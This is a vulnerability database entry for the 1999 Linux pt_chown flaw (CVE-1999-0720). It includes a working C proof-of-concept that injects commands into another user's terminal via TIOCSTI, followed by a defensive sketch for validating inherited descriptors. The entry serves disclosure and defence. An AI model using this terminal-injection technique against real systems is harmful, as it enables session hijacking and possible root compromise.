Linux pt_chown vulnerability


Vulnerability ID: 1105525
Vulnerability type: Other
Published: 1999-08-23
Updated: 2005-05-02
CVE ID: CVE-1999-0720
CNNVD-ID: CNNVD-199908-047
Platform: Linux
CVSS score: 4.6
|Vulnerability source
https://www.exploit-db.com/exploits/19467
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199908-047
|Vulnerability details
The pt_chown command on Linux is vulnerable. A local user can modify the TTY terminal devices of other users.
|Exploit
// source: http://www.securityfocus.com/bid/597/info

// pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write arbitrary data to tty input/output streams (open file descriptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise.

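#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

int main(int a,char* b[]) {

    char* c="\nclear;echo huhuhu, it worked...;id;sleep 2\n";
    int i,x;

    if (a<2) {
        fprintf(stderr,"usage: %s /dev/ttyXX\n",b[0]);
        exit(1);
    }

    x=open(b[1],1); // Flag 1 = O_WRONLY. Expect writable, allocated
                    // (eg. by screen) /dev/ttyXX as 1st arg

    if (x<0) {
        perror(b[1]);
        exit(1);
    }

    if (!fork()) {
        dup2(x,3); // pt_chown operates on descriptor 3
        execl("/usr/libexec/pt_chown","pt_chown",(char*)0);
        perror("pt_chown");
        exit(1);
    }

    sleep(1); // give the child time to run pt_chown

    // 0x5412 is TIOCSTI on Linux: queue one byte as terminal input
    for (i=0;i<(int)strlen(c);i++) ioctl(x,0x5412,&c[i]);

    return 0;
}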
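The exploit works because the setuid helper acts on whatever it inherits as descriptor 3. The block below is an added example, not glibc's code and not part of the original advisory: a Linux-only sketch of the validation a privileged helper can run on an inherited descriptor before touching ownership. The function names pty_master_slave_path and may_grant_slave and the acceptance policy are assumptions made for illustration.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: returns 0 and fills slave[] only when fd is a
 * Unix98 pty master. A tty slave, regular file or pipe returns -1. */
int pty_master_slave_path(int fd, char *slave, size_t len)
{
    struct stat st;
    unsigned int n;
    int w;

    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode))
        return -1;                  /* closed fd or not a character device */
    if (ioctl(fd, TIOCGPTN, &n) != 0)
        return -1;                  /* only a pty master answers TIOCGPTN */
    w = snprintf(slave, len, "/dev/pts/%u", n);
    return (w > 0 && (size_t)w < len) ? 0 : -1;
}

/* Hypothetical gate run before any chown(): 1 = proceed, 0 = refuse.
 * Assumed policy: fd must be a pty master, and the slave path derived
 * from it (never a caller-supplied name) must be a character device. */
int may_grant_slave(int fd)
{
    char slave[64];
    struct stat st;

    if (pty_master_slave_path(fd, slave, sizeof slave) != 0)
        return 0;
    if (lstat(slave, &st) != 0 || !S_ISCHR(st.st_mode))
        return 0;
    return 1;
}

int main(void)
{
    /* Descriptor 3 is the one the exploit above hands to pt_chown. */
    int ok = may_grant_slave(3);
    printf("fd 3: %s\n", ok ? "pty master, request accepted" : "refused");
    return ok ? 0 : 1;
}
```

Run with a tty slave, a file or nothing on descriptor 3, the program prints "refused"; only a descriptor obtained by opening the pty master passes the first check.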
|References

Source: BUGTRAQ
Name: 19990823[Linux]glibc2.1.x/wu-ftpd<=2.5/BeroFTPD/lynx/vlock/mc/glibc2.0.x
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BID
Name: 597
Link: http://www.securityfocus.com/bid/597
